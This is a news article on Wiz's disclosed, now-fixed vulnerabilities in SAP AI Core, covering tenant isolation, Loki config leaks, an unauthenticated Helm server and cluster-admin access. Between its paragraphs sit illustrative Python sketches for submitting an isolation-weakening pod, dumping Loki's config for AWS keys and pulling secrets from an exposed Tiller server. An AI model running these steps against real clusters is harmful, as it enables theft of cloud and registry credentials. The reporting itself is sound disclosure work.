Security researchers have identified several vulnerabilities in SAP AI Core, a platform that enables users to develop, train and run AI services.
These vulnerabilities, found by Wiz and discussed in an advisory published on Wednesday, highlight significant risks stemming from weak tenant isolation in AI infrastructure.
In particular, the investigation into SAP AI Core revealed that attackers could execute arbitrary code, allowing them to access sensitive customer data and cloud credentials. Such access could enable malicious actors to manipulate internal artifacts, impacting related services and other customers' environments.
Wiz’s findings showed that it was possible to read and modify Docker images on SAP’s internal container registry and Google’s Container Registry, gain cluster administrator privileges on SAP AI Core’s Kubernetes cluster, and access customers’ cloud credentials and private AI artifacts.
The research began with standard AI training procedures on SAP's infrastructure, which by design execute arbitrary, user-supplied code. From there, the team was able to bypass network restrictions and exploit several configurations that the admission controller did not block.
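The article does not spell out which pod settings slipped past the admission controller. As a rough illustration only, the Python sketch below (using the official kubernetes client; the namespace, image name, and the specific shareProcessNamespace and runAsUser values are hypothetical examples, not details confirmed by the research) shows how a training workload's pod spec can carry isolation-weakening fields that a strict admission policy would be expected to reject.

```python
# Illustrative sketch: submitting a "training" pod whose spec carries
# settings an admission controller should normally reject. The exact
# fields involved in the research are not named in this article.
from kubernetes import client, config

config.load_kube_config()  # assumes a local kubeconfig for a demo cluster

pod = client.V1Pod(
    metadata=client.V1ObjectMeta(name="training-job"),  # hypothetical name
    spec=client.V1PodSpec(
        # Lets containers in the pod see each other's processes,
        # including any sidecar injected alongside the workload.
        share_process_namespace=True,
        containers=[
            client.V1Container(
                name="trainer",
                image="registry.example.com/trainer:latest",  # hypothetical image
                command=["python", "train.py"],  # the arbitrary training code
                # A non-default UID; illustrative of the kind of field
                # an admission policy needs to constrain.
                security_context=client.V1SecurityContext(run_as_user=1337),
            )
        ],
    ),
)

client.CoreV1Api().create_namespaced_pod(namespace="tenant-a", body=pod)
```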
These exploits enabled access to sensitive tokens and configurations, leading to further vulnerabilities, including unauthorized access to AWS secrets stored in Grafana Loki's configuration and the exposure of files on AWS Elastic File System (EFS) instances.
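Grafana Loki does expose its running configuration over an HTTP /config endpoint, which is how object-storage credentials embedded in that configuration can leak to anyone who can reach the service. The sketch below assumes code already running inside the cluster; the in-cluster hostname is a placeholder, not the address from the research.

```python
# Illustrative sketch: dumping an internal Loki instance's running
# configuration via its /config endpoint and scanning the YAML output
# for credential-looking keys. The service address is hypothetical.
import requests

LOKI = "http://loki.monitoring.svc.cluster.local:3100"  # hypothetical address

resp = requests.get(f"{LOKI}/config", timeout=5)
resp.raise_for_status()

for line in resp.text.splitlines():
    if any(k in line for k in ("access_key", "secret_access_key", "session_token")):
        print(line.strip())
```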
Additionally, the team discovered an unauthenticated Helm server, which provided access to highly privileged secrets for SAP’s Docker Registry and Artifactory server. This access posed a risk of supply-chain attacks, where attackers could poison images and builds. The most critical vulnerability they uncovered was the ability to gain full cluster-admin privileges on the Kubernetes cluster, allowing access to other customers’ data and secrets.
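A Helm v2 server (Tiller) listens unauthenticated on gRPC port 44134 by default and can be driven by any helm v2 client pointed at it; the values stored with each release are one place registry and Artifactory credentials tend to end up. The sketch below assumes the legacy helm v2 CLI is installed, and the endpoint shown is a placeholder rather than the one from the research.

```python
# Illustrative sketch: enumerating releases on an exposed Tiller server
# with the helm v2 CLI and dumping each release's install-time values,
# where credentials are often embedded. The host below is hypothetical.
import subprocess

TILLER = "tiller.example.internal:44134"  # hypothetical exposed endpoint

# List the names of every release the Tiller server knows about.
releases = subprocess.run(
    ["helm", "--host", TILLER, "list", "--all", "--short"],
    capture_output=True, text=True, check=True,
)

for name in releases.stdout.split():
    # Dump the values supplied when the release was installed.
    values = subprocess.run(
        ["helm", "--host", TILLER, "get", "values", name],
        capture_output=True, text=True, check=True,
    )
    print(f"--- {name} ---\n{values.stdout}")
```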
All identified vulnerabilities were reported to SAP and have since been fixed. SAP confirmed that no customer data was compromised.
“This research demonstrates the unique challenges that the AI R&D process introduces,” Wiz said. “AI training requires running arbitrary code by definition; therefore, appropriate guardrails should be in place to assure that untrusted code is properly separated from internal assets and other tenants.”